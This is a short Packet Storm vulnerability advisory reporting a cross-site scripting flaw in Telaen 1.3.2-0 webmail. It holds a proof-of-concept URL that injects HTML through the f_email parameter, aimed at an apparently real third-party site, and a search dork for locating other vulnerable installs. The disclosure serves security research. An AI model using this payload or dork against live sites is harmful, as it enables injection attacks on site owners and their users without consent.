Telaen 1.3.2-0 Cross Site Scripting

2016-10-04T00:00:00
ID PACKETSTORM:138962
Type packetstorm
Reporter indoushka
Modified 2016-10-04T00:00:00

Description

                                        
                                            `========================================================================  
| # Title : Telaen_1.3.2-0 XSS vulnerability  
| # Author : indoushka  
| # email : indoushka4ever@gmail.com  
| # Tested on : windows 8.1 FranASSais V.(Pro)  
| # Version : 1.3.2-0  
| # Vendor : https://codeload.github.com/jimjag/telaen/legacy.zip/telaen_1.x  
| # Dork : Powered by Telaen Webmail!  
========================================================================  
  
poc :  
  
  
https://www.restaurante180.com:81//webmail/index.php?f_email=indoushka4ever@gmail.com%22()%26%25%3Cacx%3E%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E&f_user=&lid=0&six=&tid=0  
  
Greetz : aua'>>a'1/2a'1/2a'dega'deg aua'degaua'degau a'>>a'*a'*auaua'>>------au-auau-a'deg a'degaua'degauPSaua'3a'>>au-------- aua'degauau!a'>>auau aua'degauaua'*oauaua'degau ------  
|  
jericho * Larry W. Cashdollar * moncet-1 * achraf.tn |  
|  
===================== pa'degaua'1/2a'>>au auauoauau aua'>>auauauauauauC/ =============================  
`